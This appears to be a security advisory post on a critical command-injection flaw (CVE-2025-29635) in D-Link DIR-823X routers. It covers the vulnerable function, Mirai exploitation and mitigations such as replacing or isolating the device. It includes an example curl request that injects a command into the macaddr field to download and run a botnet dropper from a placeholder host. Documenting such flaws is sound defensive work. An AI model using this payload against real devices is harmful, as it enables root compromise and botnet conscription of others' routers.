D-Link DIR-823X, Command Injection, CVE-2025-29635 (Critical)

Listen to this Post

The core of this vulnerability lies in the `sub_42232C` function within the router’s firmware. The `snprintf` function improperly copies an attacker-controlled `macaddr` value into a command buffer without any validation or sanitization. This buffer is subsequently passed directly to the `system()` function for execution. An attacker can inject arbitrary operating system commands by appending them to the `macaddr` parameter within a POST request sent to the `/goform/set_prohibiting` endpoint. The router’s CGI handler then unknowingly executes this malicious string as a system command, granting the attacker remote command injection with root privileges on the device. This bypasses any standard authentication mechanisms due to the lack of input filtering.
Platform: D-Link routers
Version: 240126, 240802
Vulnerability : Command Injection
Severity: Critical
date: 2026-04-22

Prediction: No Patch

What Undercode Say:

Analytics from Akamai’s honeypot network detected the first active exploitation in March 2026. The exploit chain is a classic command injection, weaponized by the Mirai botnet to deploy malware.

Example of a vulnerable POST request
curl -X POST http://target_ip/goform/set_prohibiting \
-d "macaddr=; wget http://malicious_server/botnet_dropper.sh | sh "

Exploit:

The exploit is executed by sending an HTTP POST request to the vulnerable endpoint. The injected commands are typically used to download and execute a Mirai botnet payload. Akamai’s analysis shows that after successful injection, the attacker’s shell script (referred to as “tuxnokill”) is pulled from an external server and executed. The communication with the C2 server occurs over port 44300.

Protection from this CVE

  1. Immediate Discontinuation: D-Link has officially declared the DIR-823X series as End-of-Life (EOL). The only complete mitigation is to replace the device with a currently supported model.
  2. Network Segmentation: If replacement is not possible, isolate the device from the internet and any sensitive networks.
  3. Block Access: As a temporary measure, restrict all inbound and outbound traffic to the router’s administrative interface (TCP ports 80, 443).

Impact

Successful exploitation leads to full remote code execution (RCE) with root privileges on the router. This has resulted in the device being conscripted into the Mirai botnet, making it a participant in large-scale DDoS attacks. Furthermore, an attacker can fully compromise the device to intercept, redirect, or manipulate all network traffic passing through it, leading to a complete loss of confidentiality, integrity, and availability for the entire local network.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: www.cve.org
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top